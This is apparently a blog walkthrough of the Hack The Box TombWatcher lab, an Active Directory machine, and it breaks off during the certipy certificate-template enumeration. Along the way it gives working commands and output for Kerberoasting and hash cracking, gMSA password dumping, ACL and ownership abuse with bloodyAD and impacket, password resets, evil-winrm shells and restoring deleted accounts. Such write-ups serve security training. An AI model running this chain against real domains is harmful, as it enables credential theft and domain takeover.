TombWatcher HTB Walkthrough

Hello and welcome to another Hack the Box walkthrough. In this blog post, I am going to show you how to pwn the TombWatcher machine on hack the box. If you are new to this channel, please don’t forget to like, comment, and subscribe to my YouTube channel for more awesome content. Also, don’t forget to follow me on LinkedIn and X for more HTB walkthrough and cybersecurity related contents.

About the Machine

TombWatcher is a medium-difficulty Windows Active Directory machine that challenges players to exploit misconfigurations in Active Directory Certificate Services (AD CS). The initial foothold is gained through enumeration of vulnerable certificate templates, specifically one that allows low-privileged users to enroll certificates with the Certificate Request Agent application policy. This enables an ESC1-style attack, where a user (cert_admin) can request a certificate on behalf of a high-privileged account like Administrator, ultimately leading to domain compromise. Additionally, players must explore deleted AD objects, leveraging PowerShell to enumerate tombstoned users via Get-ADObject, restore accounts with Restore-ADObject, and regain access by resetting passwords using Set-ADAccountPassword. TombWatcher combines certificate abuse, account recovery, and AD enumeration to simulate realistic attack paths often encountered in enterprise environments.

tombwatcher htb walkthrough tombwatcher hack the box walkthrough tombwatcher hack the box writeup tombwatcher htb writeup

The first step in solving this machine is to connect my Kali Linux terminal with Hack the Box server. To set up this connection, I ran the following command in my terminal:

sudo openvpn tombwatcher.ovpn

After the connection has been set up, I started the target machine, and I was assigned an IP address of 10.10.11.72. Then I performed reconnaissance using Nmap to find all the open port and services associated with the target machine. Using the following command, I found all the services and port running at 10.10.11.72:

nmap -sCV -A 10.10.11.72

Output:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-25 13:38 EDT
Nmap scan report for 10.10.11.72
Host is up (0.044s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-25 21:38:50Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-25T21:40:16+00:00; +4h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-25T21:40:15+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-25T21:40:16+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-25T21:40:15+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-25T21:39:35
|_  start_date: N/A
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   41.91 ms 10.10.14.1
2   41.98 ms 10.10.11.72

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.70 seconds

After the nmap scan was completed, it displayed all the open ports associated with the target machine.

I noticed an error “Clock skew too great” in the nmap scan. This error is caused due to the time difference between the target machine (10.10.11.72) and our machine. To rectified this, I ran the following command in my terminal:

timedatectl set-ntp off

This command disables automatic time synchronization via NTP (Network Time Protocol) on Linux systems that use systemd. When you turn this off, your system clock will no longer update automatically using internet time servers. You'll need to manually set the time using timedatectl set-time or another method if needed.

sudo ntpdate 10.10.11.72

This command will manually synchronizes your system clock with the time server at IP address 10.10.11.72.

ntpdate queries the specified NTP server (10.10.11.72) for the current time. If successful, it sets your system time to match that server. sudo is required because changing system time needs root privileges.

timedatectl set-ntp off sudo ntpdate 10.10.11.72

Then, I saw that the "Clock: time stepped by 14399.848111". Since many Kerberos-based operations depend on accurate time synchronization, I synced my machine’s clock with the Domain Controller using "sudo ntpdate 10.10.11.72". This adjusted my system time by four hours to match the DC's clock, resolving any potential time skew issues that could prevent Kerberos authentication or ticket validation during certificate-based exploitation.

This command opens the nano text editor and I added 10.10.11.72 which I then mapped to tombwatcher.htb DC01.tombwatcher.htb. It is important to map hostnames to IP addresses on your local machine (via /etc/hosts) for several reasons, especially in development, troubleshooting, and networking scenarios. Here's why it matters:

Local Name Resolution Without DNS: The /etc/hosts file allows your system to resolve hostnames without querying a DNS server. It is useful when DNS is unavailable or misconfigured and when you're in an isolated or internal network.
Testing and Development: You can point a domain (like myapp.local) to a local or test server (e.g., 127.0.0.1 or a staging IP). For example: 127.0.0.1 myapp.local This allows testing websites or apps locally using human-readable names.
Security and Control: It can prevent connections to known malicious domains by redirecting them: 127.0.0.1 malicious-site.com

You control name resolution without relying on external DNS, reducing attack vectors.

Previously in the Nmap scan, I found port 80/tcp which has the http server associated with it. It clearly is a website, and I tried to find out what is at this port by typing 10.10.11.72 in my browser. This redirected me to the Internet Information Service page on the official Microsoft Window Server webpage. I inspected the html code and tried to check the robots.txt path but I found nothing.

I noticed on the TombWatcher machine page that there were two credentials that are likely to be a username and password (henry / H3nry_987TGV!) I tried evil-winrm with the credentials in the machine information (As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!) and tried subdomain blasting but I didn’t find or get anything useful.

After trying few other methods, then I remembered that the TombWatcher is a Windows machine and I immediately thought of using bloodhound. Bloodhound is primarily used in Active Directory (AD) environments to analyze and visualize relationships and permissions for identifying privilege escalation paths and attack vectors. It is widely used by red teamers and penetration testers to gain a foothold inside a Windows network (e.g., via phishing or exploitation). It is also used to escalate privileges, move laterally, or eventually gain Domain Admin rights. To use bloodhound, I ran the following command in my terminal:

bloodhound-python -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' -gc dc01.tombwatcher.htb -c all -ns 10.10.11.72

This was the output I got:

Output:
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 10S

After downloading the Kerberoast Python file, I moved into the directory I am currently working in (in my case, I moved the file to Desktop > TombWatcherHTB) afterwards I ran the following command in my terminal:

python3 targetedKerberoast.py -u henry -p 'H3nry_987TGV!' –dc-ip 10.10.11.72 -d tombwatcher.htb

Output:
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$a91fc19090e0144170a65c2cc33be79c$97fc1bd7bbcee1bbdc5faa5c624f2a9bfa1dc93d37398b1fbddd31c999c2957e74858bc6c61dd0c0d1cd0d12402efb877297d0c522281507c2a1c4070e2d97b8b6019c6f68ef9e6b712c52bcab61e49e4ae6850fa54dcce4f0f8a82b357fbdb4716568ec6bbee8467743fd9d28e1340bad600295f2ffe0a76b1506ddcba617ce6744cee64dad66d4b1eb1128bf10438102d11510f1f1fe83081c20712a164d5e9933889b44b2e89b5a90bce2b1497f4f10c9e1ccae3c08ea4bf376ba94a53dd95712ebc6a531b7a4a8a02c2ce7f97ab5dd6c6b8d1539b59bc84c25dec1e3b1fb3f8486ab704c642edd4d28c9445af8a4e9982bb66150e15f86dce9a8b2e99d357a55503198144a84e85faa731614d366bd40a888b591105d3df2cef496b5690419cbbbb8c5086b88ea9855f1df2334317cafcd5ef387427d3e051bdd33bf0aed5193903d0c038068f1426a6a8f28ca8fc79300c9539b45cf6913f27705526631ec8526fdbadd74a71d53b5fb026a211dc506e6ec9ca130d460c7ae1d7c3920a07767ee666ccc2e29de3a6042a0889528dbddaea51ce68145fa8ccb3d5270c747634aee60fc03e0815b0a03817195c9a0f15bd0fe366ce43179c153393386985e6ffb3f182adacf20c18ea01bdfc3f3c2d435975d33e63590bfbf7efacd962369b1d5aaf8a1ef181871d408408a9ef2b6c1b13a41e76838ad3e86ae2d9f20254d6b2dcb1f2198113a29ebf342add32ebdad6713c402ea59a5c1398d72b169bb410f96a45694eae63951f44417d538a4c99f17f42a09cdcb5d221a988b1934263439d353f8f0f62e9a621379a846381a5ba5a04b2255261e3c9008fe3c39ea36ec732d8d450b8c6834a2985d4e2c3380055f97fab04ad9cd2016e4e48ea6f0d416218d610b2e4750889aa29453291ca5605a1d7262068c706ebdc81e257bc98af2ca492a19dcc46948276c45e85cbcef8145ecbf03979ce7466bf4fe0182e082777020e14a0bce3fe2eb5420a4300d320f29e9a048203159fca09834bd8062ea57517f79a80996bd134467879b82c6d2b15b64e0896a8b4ef32f1cc0b1fdd17e7c2f2cfe758491aaba758dcd54b690ca370022ad0297cdc5d439280adcd3135b26e5d74e28b0032d55af7ef0c81b231e5cbcb412529adf9c008934f291de27dde38e81ac0e083262d98d7b4326c1bcf5dec9f764d6df0a431e8dd1d774b25e24674763e8b82583ca43dac60f89ee84ae32836c412154f25cd5cc05dc8d2dee6f5c9b4e31e9cac4c2dc30c050191a265cd4abea388ae0f4deac96c7a711df080966d4c67cd3a138521fd4fc85de10cbce362ad7a9b5b76dd147ee53bf56c6333531a91b76b47fca16d664b95034689b2ea716e5af428141fb1dea09d655a0e944970f1d09b52b0d4362ce443330587d8f2fda10086bcba48303c48c0f12dd3d87b3aa4d456cdcde516f58ed531ff460137a9ac904f8de

This started the kerberoast attack by fetching usernames from active directory with LDAP. I got a hash for Alfred and attempted cracking it with john the ripper/hashcat.

python3 targetedKerberoast.py -u henry -p 'H3nry_987TGV!' --dc-ip 10.10.11.72 -d tombwatcher.htb

I copied the hash and created a file called hash.txt and pasted the hash.

nano hash.txt

Output:
hashcat (v6.2.6) starting in autodetect mode

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900HX, 1424/2912 MB (512 MB allocatable), 8MCU

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$a91fc19090e0144170a65c2cc33be79c$97fc1bd7bbcee1bbdc5faa5c624f2a9bfa1dc93d37398b1fbddd31c999c2957e74858bc6c61dd0c0d1cd0d12402efb877297d0c522281507c2a1c4070e2d97b8b6019c6f68ef9e6b712c52bcab61e49e4ae6850fa54dcce4f0f8a82b357fbdb4716568ec6bbee8467743fd9d28e1340bad600295f2ffe0a76b1506ddcba617ce6744cee64dad66d4b1eb1128bf10438102d11510f1f1fe83081c20712a164d5e9933889b44b2e89b5a90bce2b1497f4f10c9e1ccae3c08ea4bf376ba94a53dd95712ebc6a531b7a4a8a02c2ce7f97ab5dd6c6b8d1539b59bc84c25dec1e3b1fb3f8486ab704c642edd4d28c9445af8a4e9982bb66150e15f86dce9a8b2e99d357a55503198144a84e85faa731614d366bd40a888b591105d3df2cef496b5690419cbbbb8c5086b88ea9855f1df2334317cafcd5ef387427d3e051bdd33bf0aed5193903d0c038068f1426a6a8f28ca8fc79300c9539b45cf6913f27705526631ec8526fdbadd74a71d53b5fb026a211dc506e6ec9ca130d460c7ae1d7c3920a07767ee666ccc2e29de3a6042a0889528dbddaea51ce68145fa8ccb3d5270c747634aee60fc03e0815b0a03817195c9a0f15bd0fe366ce43179c153393386985e6ffb3f182adacf20c18ea01bdfc3f3c2d435975d33e63590bfbf7efacd962369b1d5aaf8a1ef181871d408408a9ef2b6c1b13a41e76838ad3e86ae2d9f20254d6b2dcb1f2198113a29ebf342add32ebdad6713c402ea59a5c1398d72b169bb410f96a45694eae63951f44417d538a4c99f17f42a09cdcb5d221a988b1934263439d353f8f0f62e9a621379a846381a5ba5a04b2255261e3c9008fe3c39ea36ec732d8d450b8c6834a2985d4e2c3380055f97fab04ad9cd2016e4e48ea6f0d416218d610b2e4750889aa29453291ca5605a1d7262068c706ebdc81e257bc98af2ca492a19dcc46948276c45e85cbcef8145ecbf03979ce7466bf4fe0182e082777020e14a0bce3fe2eb5420a4300d320f29e9a048203159fca09834bd8062ea57517f79a80996bd134467879b82c6d2b15b64e0896a8b4ef32f1cc0b1fdd17e7c2f2cfe758491aaba758dcd54b690ca370022ad0297cdc5d439280adcd3135b26e5d74e28b0032d55af7ef0c81b231e5cbcb412529adf9c008934f291de27dde38e81ac0e083262d98d7b4326c1bcf5dec9f764d6df0a431e8dd1d774b25e24674763e8b82583ca43dac60f89ee84ae32836c412154f25cd5cc05dc8d2dee6f5c9b4e31e9cac4c2dc30c050191a265cd4abea388ae0f4deac96c7a711df080966d4c67cd3a138521fd4fc85de10cbce362ad7a9b5b76dd147ee53bf56c6333531a91b76b47fca16d664b95034689b2ea716e5af428141fb1dea09d655a0e944970f1d09b52b0d4362ce443330587d8f2fda10086bcba48303c48c0f12dd3d87b3aa4d456cdcde516f58ed531ff460137a9ac904f8de:basketball
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb...04f8de
Time.Started.....: Sat Jun 28 19:27:41 2025 (1 sec)
Time.Estimated...: Sat Jun 28 19:27:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   395.9 kH/s (0.49ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344384 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> lovers1
Hardware.Mon.#1..: Util: 18%

Started: Sat Jun 26 19:27:37 2025
Stopped: Sat Jun 26 19:27:43 2025

I got basketball after cracking the hash.

After cracking the hash and obtaining the plaintext basketball, I used bloodyAD to check if the account had the ability to modify AD objects. I discovered that I could add users to the INFRASTRUCTURE group:

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "alfred" -p "basketball" add groupMember "INFRASTRUCTURE" "alfred"

The operation succeeded, and alfred was now a member of INFRASTRUCTURE. I suspected this group had elevated permissions in the domain, so I proceeded to investigate how that could be leveraged for privilege escalation or lateral movement.

After adding alfred to the Infrastructure group, I used gMSADumper.py to check for group-managed service accounts (gMSAs) with readable credentials:

python3 gMSADumper.py -u alfred -p basketball -d tombwatcher.htb

python3 gMSADumper.py -u alfred -p basketball -d tombwatcher.htb

The script revealed that ansible_dev$ was a gMSA account whose password could be read by members of the Infrastructure group. Since I was already part of this group, I was able to retrieve the AES keys and NT hash for the account. These credentials could now be used to authenticate as ansible_dev$ — potentially granting me further access to the domain.

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "ANSIBLE_DEV$" -p :4b21348ca4a9edff9689cdf75cbda439 set password "sam" "Test1234."

bloodyAD --host "10.10.11.72" -d "tombwatcher.htb" -u "ANSIBLE_DEV$" -p :4b21348ca4a9edff9689cdf75cbda439 set password "sam" "Test1234."

impacket-owneredit -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

impacket-owneredit -action write -new-owner 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

impacket-dacledit -action 'remove' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

impacket-dacledit -action 'remove' -rights 'FullControl' -principal 'sam' -target 'john' 'tombwatcher.htb'/'sam':'Test1234.'

After identifying valid credentials for the john account (Test1234.), I used Evil-WinRM to establish an interactive shell on the target:

evil-winrm -i 10.10.11.72 -u john -p 'Test1234.'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> type ../desktop/user.txt
2366b***************************
*Evil-WinRM* PS C:\Users\john\Documents>

This gave me PowerShell access as the john user, which I then used to enumerate Active Directory, search for misconfigurations, and perform privilege escalation techniques. After successfully connecting to the target using Evil-WinRM as john, I navigated to the user’s desktop and retrieved the user flag: type ../desktop/user.txt.

evil-winrm -i 10.10.11.72 -u john -p 'Test1234.'

Hurray!!! I got the User Flag. This confirmed I had user-level access on the machine. With this initial foothold, I proceeded to enumerate local privileges and look for misconfigurations that could be leveraged for privilege escalation.

Now, it's time to get the root flag.

To investigate the domain history and potential tampering, I queried deleted objects in Active Directory using:

Get-ADObject -Filter 'IsDeleted -eq $true' -IncludeDeletedObjects -Properties *


CanonicalName                   : tombwatcher.htb/Deleted Objects
CN                              : Deleted Objects
Created                         : 11/15/2024 7:01:41 PM
createTimeStamp                 : 11/15/2024 7:01:41 PM
Deleted                         : True
Description                     : Default container for deleted objects
DisplayName                     :
DistinguishedName               : CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {12/31/1600 7:00:00 PM}
instanceType                    : 4
isCriticalSystemObject          : True
isDeleted                       : True
LastKnownParent                 :
Modified                        : 11/15/2024 7:56:00 PM
modifyTimeStamp                 : 11/15/2024 7:56:00 PM
Name                            : Deleted Objects
ObjectCategory                  : CN=Container,CN=Schema,CN=Configuration,DC=tombwatcher,DC=htb
ObjectClass                     : container
ObjectGUID                      : 34509cb3-2b23-417b-8b98-13f0bd953319
ProtectedFromAccidentalDeletion :
sDRightsEffective               : 0
showInAdvancedViewOnly          : True
systemFlags                     : -1946157056
uSNChanged                      : 12851
uSNCreated                      : 5659
whenChanged                     : 11/15/2024 7:56:00 PM
whenCreated                     : 11/15/2024 7:01:41 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 133957074324292907
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
CN                              : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
codePage                        : 0
countryCode                     : 0
Created                         : 11/15/2024 7:55:59 PM
createTimeStamp                 : 11/15/2024 7:55:59 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {6/29/2025 5:50:14 PM, 6/29/2025 5:48:04 PM, 6/29/2025 5:39:30 PM, 11/15/2024 7:56:05 PM...}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 133957074947262134
lastLogonTimestamp              : 133957069291168089
logonCount                      : 0
Modified                        : 6/29/2025 5:52:01 PM
modifyTimeStamp                 : 6/29/2025 5:52:01 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1109
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133957074782887116
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 91246
uSNCreated                      : 12844
whenChanged                     : 6/29/2025 5:52:01 PM
whenCreated                     : 11/15/2024 7:55:59 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
CN                              : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:04:05 PM
createTimeStamp                 : 11/16/2024 12:04:05 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {11/16/2024 12:04:18 PM, 11/16/2024 12:04:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 11/16/2024 12:04:21 PM
modifyTimeStamp                 : 11/16/2024 12:04:21 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : c1f1f0fe-df9c-494c-bf05-0679e181b358
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1110
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133762502455822446
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 13171
uSNCreated                      : 13161
whenChanged                     : 11/16/2024 12:04:21 PM
whenCreated                     : 11/16/2024 12:04:05 PM

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : tombwatcher.htb/Deleted Objects/cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
CN                              : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage                        : 0
countryCode                     : 0
Created                         : 11/16/2024 12:07:04 PM
createTimeStamp                 : 11/16/2024 12:07:04 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData           : {6/29/2025 5:30:16 PM, 11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName                       : cert_admin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff                      : 0
lastLogon                       : 0
lastLogonTimestamp              : 133957062638824231
logonCount                      : 0
Modified                        : 6/29/2025 5:37:01 PM
modifyTimeStamp                 : 6/29/2025 5:37:01 PM
msDS-LastKnownRDN               : cert_admin
Name                            : cert_admin
                                  DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid                       : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 133957062449136520
sAMAccountName                  : cert_admin
sDRightsEffective               : 7
sn                              : cert_admin
userAccountControl              : 66048
uSNChanged                      : 91191
uSNCreated                      : 13186
whenChanged                     : 6/29/2025 5:37:01 PM
whenCreated                     : 11/16/2024 12:07:04 PM

Get-ADObject -Filter 'IsDeleted -eq $true' -IncludeDeletedObjects -Properties *

This revealed multiple deleted instances of a user account named cert_admin, all residing in the Deleted Objects container. Each deletion instance had a unique objectSid, indicating the user was deleted and recreated multiple times, possibly as part of a privilege escalation or account abuse chain.

These results helped confirm that cert_admin was central to the compromise, and the LastKnownParent (OU=ADCS) suggested it was related to certificate services exploitation.

After discovering several deleted instances of the cert_admin account using Get-ADObject, I restored the most recent one using:

Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"

$Restore-ADObject -Identity "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"$

This brought the account back to its original location under OU=ADCS. Since AD preserves key attributes like objectSid, sAMAccountName, and group memberships during deletion (within tombstone lifetime), I was able to reuse this account to escalate privileges via ADCS certificate template abuse.

After restoring the deleted cert_admin user using Restore-ADObject, I reset its password to a known value using:

Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Test1234." -AsPlainText -Force)

Set-ADAccountPassword -Identity "cert_admin" -Reset -NewPassword (ConvertTo-SecureString "Test1234." -AsPlainText -Force)

Using certipy-ad find -vulnerable, I enumerated vulnerable certificate templates and found that WebServer was both enrollable by my user (cert_admin) and vulnerable to ESC15:

It allows EnrolleeSuppliesSubject
It uses Schema Version 1

This means I could request a certificate impersonating any domain user, including Administrator, and use it to obtain a Kerberos TGT and gain full domain access.

certipy-ad find -vulnerable -u cert_admin@tombwatcher.htb -p 'Test1234.' -dc-ip 10.10.11.72 -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
